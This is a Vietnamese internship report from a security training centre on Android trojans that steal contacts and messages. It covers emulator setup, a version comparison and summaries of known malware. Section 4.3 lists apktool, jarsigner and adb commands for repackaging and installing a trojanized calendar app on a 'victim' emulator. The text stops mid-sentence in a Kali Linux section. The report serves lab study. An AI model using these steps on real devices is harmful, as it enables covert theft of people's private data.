  • 2. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín LỜI CẢM ƠN Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với Thầy và các anh chị nhân viên đã tạo điều kiện cho em thực tập ở Athena để thực tập. Và em cũng xin chân thành cám ơn Thầy Võ Đỗ Thắng đã nhiệt tình hướng dẫn hướng dẫn em hoàn thành tốt khóa thực tập. Trong quá trình thực tập, cũng như là trong quá trình làm bài báo cáo, khó tránh khỏi sai sót, rất mong các Thầy bỏ qua. Đồng thời do trình độ lý luận cũng như kinh nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận được ý kiến đóng góp của Thầy để em học thêm được nhiều kinh nghiệm . Em xin chân thành cảm ơn !
  • 3. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín ĐÁNH GIÁ CỦA GVHD: ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................ ............................................................................................................................................................
  • 4. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín MỤC LỤC LỜI CẢM ƠN......................................................................................................................2 ĐÁNH GIÁ CỦA GVHD: ..................................................................................................3 LỊCH LÀM VIỆC TẠI TRUNG TÂM ...............................................................................5 GIỚI THIỆU TRUNG TÂM ATHENA..............................................................................5 NỘI DUNG NHIỆM VỤ CHÍNH ĐƯỢC GIAO ...............................................................7 I. NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID TRÊN MÔI TRƯỜNG GIẢ LẬP. ............8 1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập....................................8 1.1 Cài đặt Java trên máy tính. .....................................................................................8 1.2 Download và Cài đặt Eclipse, Android SDK. ........................................................9 1.3 Tạo máy AVD (Android Virtual Device).............................................................12 2. SO SÁNH SỰ KHÁC NHAU GIỮA CÁC PHIÊN BẢN ANDROID........................16 2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt......................................16 2.2. Sự khác nhau về giao diện..................................................................................17 2.3. Sự khác nhau về tính năng. ................................................................................18 2.4. Sự khác nhau về giao thức mạng. .......................................................................18 3. NGHIÊN CỨU CÀI ĐẶT TROJAN, BACKDOOR TRÊN ANDROID (IMATCH)...18 4. NGHIÊN CỨU CÁC CHƯƠNG TRÌNH CÓ CHỨA MÃ ĐỘC (iCalendar).............19 4.1. Thực trạng............................................................................................................19 4.2. Nghiên cứu lỗ hổng bảo mật trên Android.............................................................20 4.3. Cài đặt trojan trên Android (iCalendar) .................................................................21 5. NGHIÊN CỨU KALI LINUX – SỬ DỤNG KALI LINUX ĐỂ HACK ANDROID ..23 5.1 Tìm hiểu Kali Linux ...............................................................................................23 5.2 Cài đặt Kali Linux trên máy ảo VMWare................................................................24 5.3 Tạo mã độc trên Kali Linux để xâm nhập Android ..............................................32 II. THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET........................................................45 1.TRIỂN KHAI LÊN VPS.............................................................................................45
  • 5. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 1.1 Cài đặt Metasploit lên VPS...................................................................................45 2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET...............................................52 KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP ............................................................57 LỊCH LÀM VIỆC TẠI TRUNG TÂM Sáng thứ 2 4 6 từ 10h đến 14h Bắt đầu từ ngày 5/3 đến kết thúc 24/5 GIỚI THIỆU TRUNG TÂM ATHENA Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà . Lĩnh vực hoạt động chính: +Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính.. + Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,.,.... + Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí
  • 6. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,...... Đội ngũ giảng viên : +Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA +Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA Cơ sở vật chất: +Thiết bị đầy đủ và hiện đại +Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới nhất. +Phòng máy rộng rãi, thoáng mát Dịch vụ hỗ trợ: +Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn +Giới thiệu việc làm cho mọi học viên +Thực tập có lương cho học viên khá giỏi +Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời gian. +Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng máy tính, bảo mật mạng +Hỗ trợ thi Chứng chỉ Quốc tế.
  • 7. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín NỘI DUNG NHIỆM VỤ CHÍNH ĐƯỢC GIAO Phần 1 1.Cài đặt Android trên máy ảo 2.So sánh tính năng Android 2x và 4x 3.Nghiên cứu cài đặt Backdoor, Trojan cho phép nghe lén điện thoại 4.Nghiên cứu các chương trình có mã độc(iealender) 5.Nghien cứu Kali-Linux, các cơ chế tạo mã độc trên Kali-Linux==>> xâm nhập thẻ sdcard, kích hoạt camera,ghi âm trên thiết bị Andoid 6.Truyền dữ liệu trên thẻ sdcard, camera, về máy điều khiển từ xa Phần 2 1.Hướng dẫn cài đặt Metasploit lên VPS 2. Sử dụng VPS để tấn công Android trên phạm vi Internet
  • 8. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín I. NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID TRÊN MÔI TRƯỜNG GIẢ LẬP. 1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập. 1.1 Cài đặt Java trên máy tính. Để có thể lập trình được App cho Android thì trên máy tính của bạn phải đặt toàn bộ JDK. Bạn có thể download bộ JDK tại địa chỉ : tại đây. (Tùy vào phiên bản windows của bạn là 32bit hay là 64bit bạn cần download cho phù hợp) Sau khi tải bộ JDK về máy. các bạn tiến hành cài đặt chúng. Xuất hiện cửa dổ cài đặt, các bạn cứ ấn Next… Và đợi cho tới khi quá trình cài đặt hoàn tất.
  • 9. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau khi cài xong, các bạn có thể kiểm tra lại xem bộ JDK đã cài được trên máy tính của bạn chưa bẳng cách vào CMD và gõ lệnh: “java” Nếu màn hình hiện ra như sau là bạn đã hoàn thành rồi: 1.2 Download và Cài đặt Eclipse, Android SDK. Trước tiên ta phải download bộ Eclipse.
  • 10. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Các bạn vào địa chỉ : http://developer.android.com/sdk/index.html Download bộ cài đầy đủ bao gồm Eclipse và Android SDK : ADT Bundle for Windows Sau khi download về, các bạn giải nén ra và sẽ có các file như sau : Để cài đặt Android SDK các bạn có 2 cách: Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và tiến hành cài đặt. Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK Manager cũng được:
  • 11. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sẽ xuất hiện 1 cửa sổ mới như sau :
  • 12. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Công việc tiếp theo là các bạn chỉ cần tích chọn các phần API cần cài rồi click vào nút :Install packages ở góc dưới bên phải và chờ cho nó download và cài đặt là xong. 1.3 Tạo máy AVD (Android Virtual Device). Đầu tiên bạn khởi chạy Eclipse lên. Các bạn có thể xem hướng dẫn cách cài đặt Eclipse và Android SDK ở phần hướng dẫn trước. Hoặc bạn cũng có thể tham khảo thêm tạo 1 máy ảo Android trên Virtualbox mình đã hướng dẫn chi tiết ở bài trước. Sau khi khởi chạy xong Eclipse. Bạn vào : Windows ->Android Virtual Device Manager. Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu của Eclipse :
  • 13. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Click vào New để tạo mới : Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu :
  • 14. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín AVD Name : Các bạn chỉ được sử dụng cách ký tự : A -> Z, a -> z, và “., -, _” mà thôi. Target : Bạn chọn phiên bản Android để test. SD Card : Là dung lượng bộ nhớ ảo của thẻ SD. Và một số thông tin khác… Các bạn click OK để hoàn thành tạo mới một AVD. Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì bạn sẽ thấy tên máy ảo mới mình vừa tạo rồi. Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời gian để máy ảo khởi chạy) :
  • 15. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Và đây là giao diện cuối cùng :
  • 16. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 2. SO SÁNH SỰ KHÁC NHAU GIỮA CÁC PHIÊN BẢN ANDROID 2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt. Android 2.3 Android 4x Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel và cho không gian người sử dụng Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và cho không gian người sử dụng Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB Màn hình: - Màn hình phải có kích cỡ ít nhất 2,5 inch - Mật độ phải được ít nhất 100 dpi - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779 (16:9) - Công nghệ màn hình được sử dụng là công nghệ “ Square pixels” Màn hình: - Màn hình phải có kích cỡ ít nhất 426x320 - Mật độ phải được ít nhất 100 dpi - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85 (16:9)
  • 17. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải dữ liệu.Trình quản lí download phải có khả năng tải tập tin có dung lượng ít nhất 55 MB Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải dữ liệu.Trình quản lí download phải có khả năng tải tập tin có dung lượng ít nhất 100 MB 2.2. Sự khác nhau về giao diện. Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển và cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của người dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn. Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật
  • 18. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín được bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi. Android 2.3 Android 4x Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Zoom Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà không cần mở ứng dụng 2.3. Sự khác nhau về tính năng. Android 2.3 Android 4x Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet Chỉ có thể xóa tất các các thông báo cùng lúc trên trình quản lý Chỉ có thể xóa riêng rẽ các thông báo cùng lúc trên trình quản lý Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị khóa Có thể thực hiện thêm 1 số tính năng khi màn hình bị khoái ngoài trả lời , ngắt cuộc gọi như gửi tin nhắn Không có tính năng mở khóa màn hình nhận diện khuôn mặt Có tính năng mở khóa màn hình nhận diện khuôn mặt Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện được tất cả các camera trên thiết bị 2.4. Sự khác nhau về giao thức mạng. Android 2.3 Android 4x Không hỗ trợ giao thức https Hỗ trợ giao thức https 3. NGHIÊN CỨU CÀI ĐẶT TROJAN, BACKDOOR TRÊN ANDROID (IMATCH)
  • 19. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Ứng dụng iMatch đã được minh họa cách cài đặt qua clip đính kèm 4. NGHIÊN CỨU CÁC CHƯƠNG TRÌNH CÓ CHỨA MÃ ĐỘC (iCalendar) 4.1. Thực trạng Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã độc trên Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng mã độc mới được phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng Android. Đây là một con số báo động về tình trạng mã độc trên nền tảng di động của Google vừa được hãng bảo mật Kaspersky Lab công bố. Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ yếu để sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ những tin nhắn lừa đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn cắp thông tin như là mật khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được cho phép, ….. Loại mã độc này chiếm đến 63% tổng số các loại mã độc mới được phát tán trên Android trong quý I năm 2013. Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số lượng các mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013, Kaspersky đã phát hiện được số lượng mã độc mới trên các nền tảng di động bằng tổng số lượng mã độc được phát hiện trong cả năm 2012 mà Android là nền tảng chịu ảnh hưởng nặng nhất. Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các loại mã độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực bảo mật, khi sự phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc, đồng thời việc quản lý các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện cho mã độc được phát tán dễ dàng hơn trên nền tảng di động này. Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong quý I/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc chủ yếu dựa vào việc phát tán các đường link trang web có chứa mã độc. Các đường link có chứa mã độc này chủ yếu được phát tán thông qua email và trên các mạng xã hội như Facebook, Twitter… Đây được xem là biện pháp được yêu thích nhất hiện nay của hacker.
  • 20. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 4.2. Nghiên cứu lỗ hổng bảo mật trên Android. 4.2.1. Malware trên Android. Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng không hề hay biết. Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus phá hủy. 4.2.2 Cơ chế hoạt động của Malware. Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: - Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. - Giai đoạn 2 : Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. Mục đích của Malware DroidDream
  • 21. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 4.3. Cài đặt trojan trên Android (iCalendar) 1.Dùng công cụ apktool để chỉnh sửa file apk apktool if name.apk apktool d name.apk apktool b name 2.Signing ứng dụng, tạo chữ ký điện tử để thiết bị có thể sử dụng được ứng dụng keytool -genkey -v -keystore name-name.keystore -alias name -keyalg RSA - keysize 2048 -validity 10000 jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore name- name.keystore name.apk name jarsigner -verify -verbose -certs name.apk 3.Cài đặt ứng dụng lên máy nạn nhân adb -s emulator-device install name.apk
  • 22. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Demo cài đặt ứng dụng Icalendar và đã được minh họa trên clip đính kèm
  • 23. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 5. NGHIÊN CỨU KALI LINUX – SỬ DỤNG KALI LINUX ĐỂ HACK ANDROID 5.1 Tìm hiểu Kali Linux Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với BackTrack, Kali có rất nhiều cải tiến: Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ. Tính tương thích kiến trúc Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến 